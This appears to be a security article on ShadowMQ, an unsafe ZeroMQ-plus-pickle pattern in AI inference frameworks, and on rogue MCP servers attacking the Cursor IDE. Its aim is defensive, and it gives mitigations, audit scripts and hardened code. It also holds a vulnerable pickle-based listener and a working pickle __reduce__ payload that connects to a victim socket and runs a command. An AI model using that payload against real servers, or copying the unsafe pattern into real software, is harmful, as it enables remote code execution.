Modern AI stacks have shipped a cluster of bugs that look almost custom-built for attackers. Critical remote code execution flaws in inference frameworks from **Meta**, **NVIDIA**, **Microsoft**, and open-source projects like **vLLM**, **SGLang**, and **Modular Max Server** all trace back to the same design mistake: unsafe ZeroMQ messaging combined with Python **pickle** deserialization. At the same time, research into **Cursor**'s AI-powered IDE shows that attackers can hijack its built-in browser and turn a developer workstation into a fully privileged malware delivery platform.
Together, these issues show how quickly insecure patterns can propagate across AI infrastructure and development tools when teams copy architecture and code without hardening it. For defenders, they are a concrete reminder that “AI security” is not theoretical anymore; it is a classic RCE and supply-chain problem wearing a new label.
**ShadowMQ: unsafe ZeroMQ + pickle as a pattern, not a single bug**
The first piece of the picture sits inside Meta's **Llama Stack**. In affected versions, the framework exposed a ZeroMQ socket over the network and then used **recv_pyobj()** to deserialize incoming traffic via Python's **pickle** module. In other words, any endpoint that could talk to that socket could send a crafted object and gain **remote code execution** on the inference node. That flaw shipped as **CVE-2024-50050** and was later patched by switching to safer JSON-based serialization.
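To make the pattern concrete, here is a minimal sketch of the kind of code involved. It is not the Llama Stack source; the socket type, port, and handler flow are illustrative assumptions.

```python
import zmq

# Minimal sketch of the vulnerable pattern (illustrative, not the actual
# Llama Stack code): a ZeroMQ socket bound to a network interface whose
# traffic is deserialized with recv_pyobj(), i.e. pickle.loads() under the
# hood. Any peer that can reach the port controls what gets unpickled.
ctx = zmq.Context()
sock = ctx.socket(zmq.REP)
sock.bind("tcp://0.0.0.0:5555")   # assumed port; exposed beyond localhost

while True:
    request = sock.recv_pyobj()   # pickle deserialization of untrusted bytes
    # ... dispatch the request to the inference engine ...
    sock.send_pyobj({"status": "ok"})
```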
However, the more serious story is what happened next. The same unsafe pattern (ZeroMQ sockets exposed over TCP, unauthenticated endpoints, and direct pickle deserialization) showed up across multiple AI inference frameworks maintained by different vendors and communities. Oligo's research team labeled this propagation pattern **ShadowMQ**: an architecture bug that quietly spread through the ecosystem as teams copied and adapted reference code.
As the analysis expanded, researchers documented near-identical logic in:
- **vLLM** (CVE-2025-30165)
- **NVIDIA TensorRT-LLM** (CVE-2025-23254)
- **Modular Max Server** (CVE-2025-60455)
- **Microsoft's Sarathi-Serve** and the **SGLang** project, with partial or incomplete fixes at disclosure time.
From a defensive perspective, ShadowMQ matters less as “just a bug” and more as a supply-chain symptom. When core AI frameworks publish vulnerable patterns in their reference designs, that code doesn’t stay local; it shows up in forks, wrappers, and vendor products that trust the original implementation. That is exactly what we see here.
**How these AI bugs turn into real attack chains**
In practice, exploitation still requires an attacker to reach the ZeroMQ endpoints. However, many AI deployments run inference servers inside flat internal networks, on shared Kubernetes clusters, or behind load balancers that developers treat as "trusted." Once an attacker lands anywhere in that environment (via compromised credentials, a cloud misconfiguration, or a separate application bug), they can:
- Connect to the exposed ZMQ socket.
- Ship a malicious pickle object that abuses the unsafe **recv_pyobj()** logic (a minimal sketch of such a payload follows this list).
- Gain code execution on the inference node and pivot across the AI cluster.
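For the second step, the classic building block is a pickle "reduce gadget": an object whose `__reduce__` method tells the unpickler to call an arbitrary function. The snippet below is a deliberately harmless sketch (it only runs `id`), and the endpoint address and socket type are assumptions; in a real attack the callable and arguments would be whatever the attacker wants executed on the inference node.

```python
import pickle
import zmq

class Payload:
    # pickle records the result of __reduce__ when serializing; on the victim
    # side, unpickling re-executes the returned callable with these arguments.
    def __reduce__(self):
        import os
        return (os.system, ("id",))   # harmless placeholder command

# Delivery sketch: connect to the exposed socket and send the crafted object.
ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect("tcp://victim-inference-node:5555")   # assumed endpoint
sock.send(pickle.dumps(Payload()))   # recv_pyobj() on the server runs os.system("id")
```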
At that point, the difference between “AI bug” and “standard infrastructure compromise” disappears. Attackers can:
- Steal model weights and training data.
- Tamper with responses and silently poison downstream applications.
- Deploy additional malware such as crypto-miners or lateral-movement tooling.
Because these inference engines often sit at the center of latency-sensitive workloads, defenders rarely instrument them as heavily as traditional front-end services. As a result, a ShadowMQ exploit can look like “just another internal service talking to the model,” while in reality it runs arbitrary Python code inside the cluster.
**Echoes of Llama's CVE-2024-50050 in vLLM, TensorRT-LLM, and other frameworks**
Meta's Llama Stack vulnerability (**CVE-2024-50050**) was the first widely documented example. The fix replaced pickle with JSON and tightened the messaging interface.
Later, as researchers audited related projects, they found:
- **vLLM's V0 engine** accepted data from a ZeroMQ SUB socket and deserialized it using pickle, enabling RCE across nodes in a multi-host deployment (CVE-2025-30165).
- **NVIDIA TensorRT-LLM** shipped a Python executor flaw (CVE-2025-23254) that allowed lower-privileged access to escalate into full code execution and data tampering on the inference server.
- **Modular Max Server** and **SGLang** reused logic adapted from vLLM, carrying the same unsafe pattern forward in slightly altered form.
For defenders, this looks very similar to what we already know from classic OSS supply-chain incidents. Reference code that uses unsafe deserialization with **pickle** and **ZeroMQ** becomes a template. Even if each project tweaks names or control flow, the underlying risk remains identical.
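One practical way to act on that observation is to audit your own forks and vendored code for the template itself. The sketch below scans a source tree for the risky call sites; the regex patterns are a heuristic starting point, not a complete detector.

```python
import re
import sys
from pathlib import Path

# Rough audit sketch: flag Python files that contain pickle-style
# deserialization entry points commonly paired with ZeroMQ transports.
RISKY = [
    re.compile(r"\brecv_pyobj\s*\("),
    re.compile(r"\bpickle\.loads?\s*\("),
    re.compile(r"\bcloudpickle\.loads?\s*\("),
]

def scan(root: str) -> None:
    for path in Path(root).rglob("*.py"):
        text = path.read_text(errors="ignore")
        for pattern in RISKY:
            for match in pattern.finditer(text):
                line_no = text.count("\n", 0, match.start()) + 1
                print(f"{path}:{line_no}: {match.group(0)}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")
```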
**Cursor's browser and rogue MCP servers: turning AI IDEs into malware delivery platforms**
The second half of the research focuses on **Cursor**, an AI-powered code editor built on top of the VS Code / Electron stack. Its new built-in browser and Model Context Protocol (**MCP**) support give AI agents more reach into web apps and internal tools. Unfortunately, they also give attackers a much larger attack surface.
Knostic’s analysis shows that a malicious local MCP server can:
- Register itself via a benign-looking **mcp.json** config (a hypothetical example follows this list).
- Inject JavaScript into Cursor's internal browser at runtime.
- Replace real login pages with phishing pages that steal credentials and send them to an attacker-controlled endpoint.
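For context, Cursor-style MCP configuration typically lives in a small JSON file under the project or user profile. The snippet below is a hypothetical example of how innocuous such an entry can look; the server name, command, and package name are invented for illustration.

```json
{
  "mcpServers": {
    "docs-helper": {
      "command": "npx",
      "args": ["-y", "docs-helper-mcp"],
      "env": {}
    }
  }
}
```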
Because Cursor inherits Node.js and Electron’s privileges, malicious JavaScript running in that context can access local files, modify extensions, and persist changes that survive restarts. Previous research into Cursor and VS Code already demonstrated similar risks under names like “CurXecute” and “MCPoison,” where flawed MCP handling enabled remote or arbitrary code execution against developer machines.
In other words, once an attacker convinces a developer to enable a rogue MCP server or install a compromised extension, the IDE effectively becomes an **elevated malware agent**. It can read SSH keys, manipulate repos, poison CI pipelines, and push backdoored code into production.
**Why these bugs show a broader AI supply-chain problem**
From a seasoned defender’s perspective, none of this is really “new.” We have seen unsafe deserialization, over-privileged services, and IDE extension abuse for years. What changed is the velocity and blast radius. AI frameworks and MCP servers are:
- widely reused as reference implementations,
- packaged into turnkey stacks and SaaS offerings, and
- deployed deep inside both infrastructure and developer workflows.
As a result, a single design mistake, such as treating ZeroMQ + pickle as "good enough" for internal messaging or trusting MCP servers by default, can propagate into hundreds or thousands of downstream environments. When those components sit next to GPUs, production models, or CI/CD secrets, the risk profile escalates quickly.
**Practical defense: what to change in AI infra and dev tooling**
For AI platform teams, a few moves now pay off later:
First, treat **inference engines as threat boundaries**, not internal plumbing. That means blocking direct network exposure for ZeroMQ and similar protocols, using mTLS or authenticated channels where possible, and isolating inference nodes into dedicated segments with tight egress controls.
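As one concrete option for the authenticated-channel point, pyzmq supports CURVE encryption and authentication. The sketch below shows the server side only, with key handling simplified for illustration; in practice you would distribute and pin client public keys rather than accept any completed handshake.

```python
import zmq
import zmq.auth
from zmq.auth.thread import ThreadAuthenticator

# Sketch: a CURVE-secured ZeroMQ server socket. Peers must complete an
# encrypted CURVE handshake; plaintext clients are rejected outright.
ctx = zmq.Context()

auth = ThreadAuthenticator(ctx)
auth.start()
# For illustration only: accept any client that completes the handshake.
# In production, point `location` at a directory of approved client public keys.
auth.configure_curve(domain="*", location=zmq.auth.CURVE_ALLOW_ANY)

server_public, server_secret = zmq.curve_keypair()
sock = ctx.socket(zmq.REP)
sock.curve_secretkey = server_secret
sock.curve_publickey = server_public
sock.curve_server = True          # enable CURVE on this socket
sock.bind("tcp://0.0.0.0:5555")   # assumed port
```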
Second, aggressively **eliminate unsafe deserialization**. If any component uses Python's **pickle**, Java's native serialization, or similar formats to deserialize untrusted or semi-trusted data from the network, that code should be treated as a vulnerability until proved otherwise. Safer formats (JSON, Protobuf, Cap'n Proto) and strict schema validation should be the baseline.
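A minimal sketch of that safer baseline, assuming the messages can be expressed as plain JSON; the field names and validation rules are placeholders to adapt to your own message schema.

```python
import zmq

# Sketch: replace recv_pyobj()/pickle with recv_json() plus strict,
# explicit validation of the decoded structure before it is used.
ALLOWED_OPS = {"generate", "health"}   # example operations

def validate(msg):
    if not isinstance(msg, dict):
        raise ValueError("message must be a JSON object")
    if msg.get("op") not in ALLOWED_OPS:
        raise ValueError("unknown operation")
    if not isinstance(msg.get("prompt", ""), str):
        raise ValueError("prompt must be a string")
    return msg

ctx = zmq.Context()
sock = ctx.socket(zmq.REP)
sock.bind("tcp://127.0.0.1:5555")   # keep it off external interfaces

while True:
    try:
        request = validate(sock.recv_json())   # json.loads under the hood
    except ValueError as exc:
        sock.send_json({"status": "error", "reason": str(exc)})
        continue
    # ... hand the validated request to the inference engine ...
    sock.send_json({"status": "ok"})
```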
Third, extend **ransomware-style hardening** to AI clusters. That includes strict identity for machine-to-machine traffic, dedicated backup strategies for model artifacts and training data, and a continuous inventory of where each inference framework version runs inside the estate.
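For the inventory point, even a small per-node script that reports which inference frameworks and versions are installed gives you something to compare against the advisories. The package names below are examples, and the comparison against fixed versions is deliberately left to you: take the minimum patched versions from the vendor advisories rather than hard-coding them from memory.

```python
from importlib import metadata

# Sketch: report locally installed inference-framework versions so they can
# be collected centrally and compared against the fixed versions listed in
# the relevant advisories. Package names are examples; extend as needed.
FRAMEWORKS = ["vllm", "sglang", "tensorrt-llm", "llama-stack"]

def inventory() -> dict:
    found = {}
    for name in FRAMEWORKS:
        try:
            found[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            continue
    return found

if __name__ == "__main__":
    for name, version in inventory().items():
        print(f"{name}=={version}")
```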
On the developer side, organizations should treat AI-powered IDEs like any other high-value endpoint:
- Disable or constrain **Auto-Run** behavior for MCP servers and extensions.
- Maintain a curated allowlist of trusted MCP servers, with code-review requirements and explicit ownership.
- Monitor for new or unapproved MCP endpoints and browser components inside IDEs (see the inventory sketch after this list).
- Educate developers that "AI helper servers" are **remote code execution vectors**, not harmless sidecars.
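As a starting point for that monitoring, the sketch below walks a developer machine for Cursor-style MCP configuration files and reports any server entries not on an allowlist. The config paths, JSON layout, and allowlist names are assumptions based on common MCP setups; adjust them to what your IDEs actually write.

```python
import json
from pathlib import Path

# Sketch: find MCP server entries in Cursor-style config files and flag any
# that are not on an explicit allowlist. File locations and JSON layout are
# assumptions; adapt to your environment and IDE versions.
APPROVED = {"internal-docs", "issue-tracker"}   # example allowlist entries

def find_configs(code_root: Path) -> list:
    candidates = [Path.home() / ".cursor" / "mcp.json"]        # global config (assumed path)
    candidates += list(code_root.rglob(".cursor/mcp.json"))    # per-project configs
    return [p for p in candidates if p.is_file()]

def check(code_root: Path) -> None:
    for config in find_configs(code_root):
        try:
            servers = json.loads(config.read_text()).get("mcpServers", {})
        except (OSError, json.JSONDecodeError):
            continue
        for name, spec in servers.items():
            if name not in APPROVED:
                print(f"UNAPPROVED MCP server '{name}' in {config}: {spec}")

if __name__ == "__main__":
    check(Path.home() / "code")   # assumed location of checked-out projects
```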
Finally, AI security needs to plug into existing threat-modeling and vulnerability-management programs, not operate as a separate track. ShadowMQ and the Cursor browser bugs are classic examples of why: they are not “prompt injection problems,” they are direct RCE and supply-chain issues that just happen to live inside AI-branded software.
**FAQs**
Q: What is ShadowMQ in the context of AI security?
A: ShadowMQ is a pattern where AI frameworks reuse ZeroMQ messaging code that deserializes network data with Python's pickle, creating repeatable RCE conditions across Meta Llama Stack, vLLM, TensorRT-LLM, and related projects.
Q: How serious are the CVEs tied to these AI inference engines?
A: CVE-2024-50050, CVE-2025-30165, and CVE-2025-23254 all enable code execution on inference servers under realistic conditions, which can lead to model theft, data exposure, and further compromise of connected systems.
Q: Do these vulnerabilities require direct internet exposure of the AI service?
A: Not necessarily. Attackers can often reach ZeroMQ endpoints from inside the network after exploiting other services, misconfigurations, or stolen credentials, then use ShadowMQ-style flaws as a lateral-movement amplifier.
Q: How can a rogue MCP server compromise a developer using Cursor?
A: A malicious MCP server can inject JavaScript into Cursor's built-in browser, replace login flows with phishing pages, and run with the IDE's privileges to read files, modify extensions, and persist malware inside the development environment.
Q: What are the most effective short-term mitigations?
A: Inference teams should disable unsafe serialization, patch to fixed versions, and isolate AI services. Developer teams should lock down MCP usage, vet extensions, and treat AI IDEs as privileged endpoints that require monitoring and hardening.